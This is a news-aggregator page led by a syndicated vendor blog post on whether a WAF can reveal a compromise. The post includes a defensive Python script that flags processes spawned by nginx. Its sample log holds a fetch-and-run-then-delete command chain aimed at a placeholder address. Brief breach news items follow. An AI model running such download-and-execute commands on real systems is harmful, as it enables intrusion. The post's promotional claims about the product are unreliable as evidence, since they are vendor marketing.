Tag: compromised

#cybersecurity | #hackerspace | Will Your WAF Know When You Are Compromised?

Source: National Cyber Security – Produced By Gregory Evans

In my last blog post, “The Existential Crisis of a WAF,” I walked through what happens when an attack gets through: a rule that does not match, a device misconfiguration, or traffic the device cannot see. The last case includes an inability to decrypt and parse the traffic, as at Equifax, where an expired certificate on the inspection device left encrypted traffic unexamined for months. I also discussed Trusted Execution™, a new technology that provides real value over rule-based network security devices, including:

  1. Protection against Zero-Day attacks
  2. No False Positives = No Tuning and No Learning
  3. Visibility of the full “Kill-Chain”
  4. Blocking action at any phase of the Kill-Chain
  5. Very low Total Cost of Ownership

In this second installment, I want to explore the true cost in staff-hours of a rule-based network security device such as a WAF, next-generation firewall, or IDS/IPS. I am not going to put a number on the scenario below; instead, I want you to think about what the real cost is to you and your organization.

Good Guy Defensive Hacker Training

But first, I want to take a stroll down Memory Lane (no overflows, please…). When I was a young buck in the Air Force, I became an expert at the various IDS and firewall devices deployed at the time. One of the firewalls I managed had several protocol “proxies,” including one for HTTP, which let it understand web traffic at the application layer and enforce a negative security model for that protocol. In that sense, the firewall was a predecessor of the WAF. It protected the base’s web page and several employee portals, which was cutting-edge at the time. Every day I would come in and sift through the firewall logs to make sure no big red flags were present. I thought I was so cool, being the only one on base able to read the mountains of log entries.

That all changed when I was selected for a DoD Unix Security Course, where I was first introduced to the buffer overflow in the Unix finger daemon and the sendmail debug hole, two of the vectors that let the famed Morris Worm spread so successfully in 1988 (https://en.wikipedia.org/wiki/Morris_worm).

I learned how to think like a hacker: carefully performing target selection, reconnaissance, enumeration, and exploitation, and finally covering my tracks. I also learned methods to meticulously lock down a system to defend against those same techniques. To conclude the course, everyone competed in a “Capture the Flag” exercise, which was both exhilarating and enlightening. By the end, I was completely pumped about cybersecurity. Who knew that learning hacking techniques would open up new possibilities and turn my professional world upside down?! Sure, I had dabbled in hacking before, but mostly with services like SMTP and FTP and rudimentary password cracking. Slackware Linux was only just gaining popularity as a free Unix-like operating system you could use for hacking; until then, serious hacking was restricted to licensed Unix systems such as Solaris, which were cost-prohibitive for a novice.

As Awareness Increases, a Scarier Reality Emerges

Knowing more also had its challenges. When I got back to my daily job reviewing firewall logs, I started asking the tough “what if” questions: What if I messed up the firewall and exposed us? What if an attack got through? What if there is a hacker in our systems RIGHT NOW??? I could get court-martialed for incompetence! Shortly after my Unix Security training, the Air Force decided to classify all information systems as weapon systems. That meant we now had to perform an extensive security audit, classification, and readiness accreditation of every IT system on base. I had to draft the contingency plans covering the possibility of a compromised system, which led to an extremely important question, perhaps the most important question a security person can ask:

“If we were compromised, how would I know?”

How Do You Know If Your Network Is Compromised?

Fast-forward to today, and guess what? That question is still valid: how do you know if you are compromised? If you manage ANY security product, the one fact you have to accept is that you don’t know what you don’t know. If an attack is not recognized by your security device, for any of the reasons mentioned at the beginning of this post, can you prove that you were (or weren’t) compromised?

Consider this scenario. Suppose I write a script that tests for all 34 CVEs documented against the Nginx web server (https://www.cvedetails.com/vendor/10048/Nginx.html), assuming each of them can be tested over the network, and I slip in one or two zero-day tests that actually get through (Yay Me!). Against a single target IP address, how many WAF alerts will you have? IDS alerts? Firewall alerts?

Thankfully, you may have a SIEM that gives you a grand total of 153 alerts (a completely arbitrary number) across every device in the path, including that shiny new RASP you just installed on the targeted server. Now what? What is the contingency plan to make sure every security device did its job and blocked the 34 attacks? Or was it 36? Or 100? Do you really know???

It just so happens that attack number 35 was a fileless buffer overflow that had not yet been released to the public, and I now own the box with at least the privileges of the Nginx process. (Inquire about our Nginx Attack Demo.) I am now “living off the land” until I am discovered. This period is called dwell time, and the clock is ticking, so I have to work fast to secure the beachhead and cover my tracks. I figure I generated enough “noise” with the other attacks to keep you (the security administrator) busy trying to work out what just happened. Chances are good you won’t find out I’m in your network for a while.

Choose Between Blind Action or No Action?

So, now what? What is your course of action if you think an attack may have happened but you’re not sure? Without sufficient evidence that the breach attempt succeeded, can you request that the server be quarantined? How long will it take to sift through all the alerts and document the attack with enough compelling evidence to justify disrupting the business? Can the server just be replaced with a known-good image? What is the real cost of reacting to an attack? Or of not reacting? AND will you react this way EVERY SINGLE TIME you see a flutter of alerts from an opportunistic web scanner?

20/20 Virsec Vision

I now have to ask another “what if” question: What if you had a tool in your toolbox that showed exactly what did, or did not, happen to that Nginx web server? What if you could open the Virsec UI and see that an attack got through the network, but Virsec did its job and killed the spawned process? Virsec’s Trusted Execution technology detected the buffer overflow, saw the Nginx process jump from an authorized memory location to an unauthorized one, and triggered a Micro-Protection action that killed the offending process ID, returning the application to normal operation. No guesswork, no forensics, no quarantining, just a copacetic server humming along, serving its share of inconvenienced electrons in the form of web pages.

Virsec In Action

In the example shown in the original post (a screenshot not reproduced here), the Virsec system is in monitoring mode so the entire kill chain of the attack is visible. Reading from the bottom line up, it starts with a buffer overflow, where the system detects a jump to a memory location not intended by the application. We then see hostname executed, followed by a wget that creates a file, modifies it, then deletes it.

Buffer overflow attacks are usually extremely hard to detect with conventional security products. In protection mode, Virsec would have killed the offending process at the first alert, stopping the attacker before the rest of that chain could run.
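As an added example (not code from the original post or from Virsec), here is the kind of check that lets you answer the question for the Nginx host in this scenario without guessing: put the SIEM’s alert counts beside a process-start trail from the server and flag anything that descends from an nginx worker. Both inputs are constructed sample data in an assumed key=value line format; real auditd or EDR output would need its own parser. The process chain mirrors the one the post describes (buffer overflow, hostname, wget, a dropped file, cleanup), and the hostnames, PIDs and addresses are invented.

```python
"""Added example (not code from the original post or from Virsec): why alert
counts cannot answer "were we compromised?" while process lineage on the
targeted host can. Both inputs are constructed sample data in an assumed
key=value line format standing in for a SIEM export and a host
process-start trail (fork/exec events as auditd or an EDR sensor would log)."""
import shlex
from collections import Counter
from dataclasses import dataclass
from typing import Dict, FrozenSet, List

# Constructed SIEM alerts from every device in the path. They measure how
# noisy the scan was; none of them says whether a request did anything.
SIEM_ALERTS = """\
2019-10-01T12:00:01Z device=waf action=block sig=nginx-cve-probe-01 src=203.0.113.7
2019-10-01T12:00:01Z device=ids action=alert sig=nginx-cve-probe-01 src=203.0.113.7
2019-10-01T12:00:02Z device=waf action=block sig=nginx-cve-probe-02 src=203.0.113.7
2019-10-01T12:00:02Z device=ids action=alert sig=nginx-cve-probe-02 src=203.0.113.7
2019-10-01T12:00:03Z device=fw action=allow sig=none src=203.0.113.7
2019-10-01T12:00:04Z device=rasp action=alert sig=anomalous-request src=203.0.113.7
2019-10-01T12:00:05Z device=waf action=pass sig=none src=203.0.113.7
""".splitlines()

# Constructed process-start trail from the nginx host, mirroring the chain the
# post describes: worker -> hostname -> wget drops a file -> sh runs it -> rm.
EXEC_TRAIL = """\
2019-10-01T11:59:00Z pid=1100 ppid=1 uid=0 comm=nginx exe=/usr/sbin/nginx args="nginx -g daemon off;"
2019-10-01T11:59:00Z pid=1203 ppid=1100 uid=33 comm=nginx exe=/usr/sbin/nginx args="nginx: worker process"
2019-10-01T12:00:05Z pid=1450 ppid=1203 uid=33 comm=hostname exe=/bin/hostname args="hostname"
2019-10-01T12:00:06Z pid=1451 ppid=1203 uid=33 comm=wget exe=/usr/bin/wget args="wget http://198.51.100.9/a -O /tmp/a"
2019-10-01T12:00:07Z pid=1452 ppid=1203 uid=33 comm=sh exe=/bin/sh args="sh /tmp/a"
2019-10-01T12:00:08Z pid=1453 ppid=1452 uid=33 comm=rm exe=/bin/rm args="rm -f /tmp/a"
2019-10-01T12:00:09Z pid=1460 ppid=1 uid=0 comm=cron exe=/usr/sbin/cron args="cron"
2019-10-01T12:00:10Z pid=1461 ppid=1460 uid=0 comm=logrotate exe=/usr/sbin/logrotate args="logrotate /etc/logrotate.conf"
""".splitlines()


@dataclass
class Proc:
    ts: str
    pid: int
    ppid: int
    uid: int
    comm: str
    exe: str
    args: str


def parse_proc(line: str) -> Proc:
    """Parse one key=value event; shlex keeps the quoted args as one field."""
    ts, *kvs = shlex.split(line)
    f = dict(kv.split("=", 1) for kv in kvs)
    return Proc(ts, int(f["pid"]), int(f["ppid"]), int(f["uid"]),
                f["comm"], f["exe"], f.get("args", ""))


def lineage(procs: Dict[int, Proc], pid: int) -> List[Proc]:
    """Walk from pid toward init, child first; stop at unknown or looping pids."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def unexpected_children(trail: List[str], server_comm: str = "nginx",
                        allowed: FrozenSet[str] = frozenset()) -> List[Proc]:
    """Every process descending from server_comm that is not on the allowlist.
    A plain nginx worker serves files and proxies; it never needs to spawn
    hostname, wget or sh, so the allowlist stays empty unless you run CGI."""
    procs = {p.pid: p for p in map(parse_proc, trail)}
    hits = []
    for p in procs.values():
        if p.comm == server_comm or p.comm in allowed:
            continue
        if any(a.comm == server_comm for a in lineage(procs, p.pid)[1:]):
            hits.append(p)
    return sorted(hits, key=lambda p: (p.ts, p.pid))


def alert_summary(alerts: List[str]) -> Counter:
    """Alerts per device: the number the SIEM hands you, and nothing more."""
    return Counter(shlex.split(line)[1].split("=", 1)[1] for line in alerts)


def triage(alerts: List[str], trail: List[str]) -> dict:
    """Put the two views side by side and say what each one can prove."""
    summary, hits = alert_summary(alerts), unexpected_children(trail)
    return {
        "alert_count": sum(summary.values()),
        "per_device": dict(summary),
        "unexpected": [f"{p.ts} {p.comm}[{p.pid}] ppid={p.ppid}: {p.args}" for p in hits],
        "verdict": ("host shows post-exploitation execution" if hits else
                    "no execution recorded on the host (absence of evidence, not proof)"),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SIEM_ALERTS, EXEC_TRAIL), indent=2))
```

Run it and the seven alerts get counted, but the verdict comes from the four processes spawned under the worker, not from the alert total. Note the caveat the empty case carries: an empty finding list means no execution was recorded, which is not proof the host is clean. An attacker who stays inside the nginx process and never execs anything leaves no trace here, which is exactly the gap that memory-level detection of the kind described above is meant to cover.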

The result? You cut costs in the form of staff-hours, prove value in defending the network, and safeguard your customers’ data from theft. You become the hero and they put a bronze statue of you in the lobby. Your next stop? CISO!

I hope you enjoyed this post, and for those of you who are maintaining industry certifications, don’t forget to put in for your CPEs when you read any of our blog posts. Cheers!

Further resources:

The Existential Crisis of a WAF

Making Applications Truly Self Defending: Nine Ways That Virsec Fills Gaps in RASP Security to Deliver Full Stack Application Security Self Defense

 

The post Will Your WAF Know When You Are Compromised? appeared first on Virsec Systems.

*** This is a Security Bloggers Network syndicated blog from Blog – Virsec Systems authored by Mark Pelkoski. Read the original post at: https://virsec.com/will-your-waf-know-when-you-are-compromised/


The post #cybersecurity | #hackerspace | Will Your WAF Know When You Are Compromised? appeared first on National Cyber Security.

View full post on National Cyber Security

#cyberfraud | #cybercriminals | How compromised emails enable cybercrime and real estate scams — Quartz

Source: National Cyber Security – Produced By Gregory Evans

The CEO of an unidentified Swiss company was scammed out of nearly $1 million by a multinational fraud ring, according to a criminal complaint unsealed last week in federal court. The executive, who is identified in the filing only as “S.K.,” was in the process of […]

View full post on AmIHackerProof.com

Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach

Source: National Cyber Security – Produced By Gregory Evans


Hackers have once again targeted Verticalscope, a Canadian firm that manages hundreds of popular web discussion forums with over 45 million user accounts. The breach has compromised at least 2.7 million user accounts. The Toronto-based company runs a network of support forums and online community websites catering to a wide range of interests, from outdoor and automotive to sports and technology.

In June 2016, Verticalscope admitted that it had suffered a data breach that compromised at least 45 million user accounts, after the leaked data was reported in a blog post on Leakedsource.com.

The latest breach impacted six websites, including Toyotanation.com, Jeepforum.com – the company’s second-most popular website – and Watchuseek.com, security expert Brian Krebs first reported.

Security researcher and founder of Hold Security, Alex Holden, notified Krebs last week that hackers were selling access to Verticalscope.com and a number of other sites operated by the company.

Holden initially suspected that a nefarious actor was just trying to resell data stolen in the 2016 breach.

“That was before he contacted one of the hackers selling the data and was given screen shots indicating that Verticalscope.com and several other properties were in fact compromised with a backdoor known as a ‘Web shell’,” Krebs wrote. “With a Web shell installed on a site, anyone can remotely administer the site, upload and delete content at will, or dump entire databases of information — such as usernames, passwords, email addresses and Internet addresses associated with each account.”

The hackers had obfuscated certain details in the screenshots, but enough remained for Holden to locate at least two backdoors, on Verticalscope’s website and on Toyotanation.com, one of the company’s most popular forums.

Krebs reported that a simple search on one of Verticalscope’s compromised domains led to a series of Pastebin posts that have since been deleted “suggesting that the individual(s) responsible for this hack may be trying to use it to advertise a legally dicey new online service called LuiDB”.

“Similar to Leakedsource, LuiDB allows registered users to search for account details associated with any data element compromised in a breach — such as login, password, email, first/last name and Internet address,” Krebs noted. “The first search is free, but viewing results requires purchasing a subscription for between $5 and $400 in Bitcoin.”

“The intrusion granted access to each individual website files,” Verticalscope said in a statement to Krebs. “Out of an abundance of caution, we have removed the file manager, expired all passwords on the 6 websites in question, added the malicious file pattern and attack vector to our detection tools, and taken additional steps to lock down access.”

The company did not provide any details regarding when and how the attack took place or who carried out the hack. IBTimes UK has reached out to Verticalscope for further details.

The post Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach appeared first on National Cyber Security Ventures.


FICO’s New Fraud Solution Can Detect Compromised Cards Faster

Source: National Cyber Security – Produced By Gregory Evans


FICO has announced the launch of FICO Card Compromise Manager, an anti-fraud solution that proactively detects and prioritizes compromised merchants and data breaches or theft involving card data. According to a press release publicizing the news, Card Compromise Manager detects card present, card not present and ATM fraud faster than…

The post FICO’s New Fraud Solution Can Detect Compromised Cards Faster appeared first on National Cyber Security Ventures.


AP police recruitment website compromised by ‘hacking class’


Source: National Cyber Security – Produced By Gregory Evans


HYDERABAD: The Andhra Pradesh State-Level Police Recruitment Board (APSLPRB), whose tag line is “transparency through technology”, has fallen prey to hackers. The portal is managed in Hyderabad. Three days ahead of accepting online applications (August 3) for filling Stipendiary Cadet Trainee (SCT) constable posts in various wings of AP police department through the newly launched […]

The post AP police recruitment website compromised by ‘hacking class’ appeared first on National Cyber Security.


Blockchain Social Media Steemit Compromised; Investigation Underway


Source: National Cyber Security – Produced By Gregory Evans


Blockchain-based social media service Steemit today reported that its platform has suffered a security breach. The attack, according to CEO Ned Scott, affected over 260 user accounts. He further confirmed that the platform has also incurred a small loss, worth around $85,000, in the form of its native cryptocurrencies Steem Dollars and […]

The post Blockchain Social Media Steemit Compromised; Investigation Underway appeared first on National Cyber Security.


Source: National Cyber Security – Produced By Gregory Evans

He is special guest at the Ground Zero Summit 2015 being organised by Indian Infosec Consortium – a group of ethical hackers.

“Threat to national security has moved to the digital dimension. Terrorist organisations have turned social networks and online forums into recruitment hotbeds and propaganda mechanisms. We need a security apparatus in the digital space to address this threat. Hackers are the face of this digital army.”

The actor said he is bringing his whole team, including the scriptwriters of the show, to observe and interact with the ethical hacker community.

“From November 22, I will start shooting for 24. It will go on air in 2016. When an actor prepares for a role, we often start to live like the character. Some call it method acting. We meet real life people like the character and try to understand their nuances, their life,” he said.

As per the summit’s website, speakers will share details of the espionage mission as well as hold sessions on hacking of cellular networks and of medical devices in hospitals, using technical loopholes in them.

The consortium claims to have discovered a cyber espionage operation under which phones of Indian Army personnel, who had downloaded a news-related mobile application, had been compromised by hackers based in Pakistan. IIC CEO Jiten Jain has said that the findings were handed over to security agencies, who promptly acted and sanitised the infected handset early this year.

For more information go to http://www.NationalCyberSecurity.com, http://www.GregoryDEvans.com, http://www.LocatePC.net or http://AmIHackerProof.com

The post appeared first on National Cyber Security.

Raptr Accounts Hacked, Accounts Compromised


Source: National Cyber Security – Produced By Gregory Evans

It has emerged that gaming service Raptr has become the latest high-profile hacking casualty. This follows the 2011 hack of Sony’s PlayStation Network, as well as the more recent DDoS attacks against both PSN and Microsoft’s Xbox Live platform. Raptr has shared few concrete details about how its security was compromised, but users are strongly advised to change their passwords immediately. Emails have been sent to account holders alerting them to the Raptr hack, as noted by NeoGAF forum member Yatesl. “I’ve just received an email from Raptr. Some users may use them to aggregate achievements, and they also partner with AMD for their GeForce Experience type program,” he said in a post on the popular gaming message boards. In the email from Raptr, also posted on the official Raptr company website, CEO Dennis Fong details the extent of the hack and urges users to change their passwords immediately by heading to the Raptr account page. Fong encourages users who share the same Raptr username and password with other services to change their login details on those services as well. “User names, email addresses, password hashes and some first and last names may have been […]


The post Raptr Accounts Hacked, Accounts Compromised appeared first on National Cyber Security.


Bitly website hacked, accounts credentials compromised

Bitly (bit.ly), the popular URL-shortening service, has issued an urgent security warning about a breach that exposed account credentials. The company says it found no evidence suggesting that any accounts have been accessed by the intruders.


The post Bitly website hacked, accounts credentials compromised appeared first on National Cyber Security.
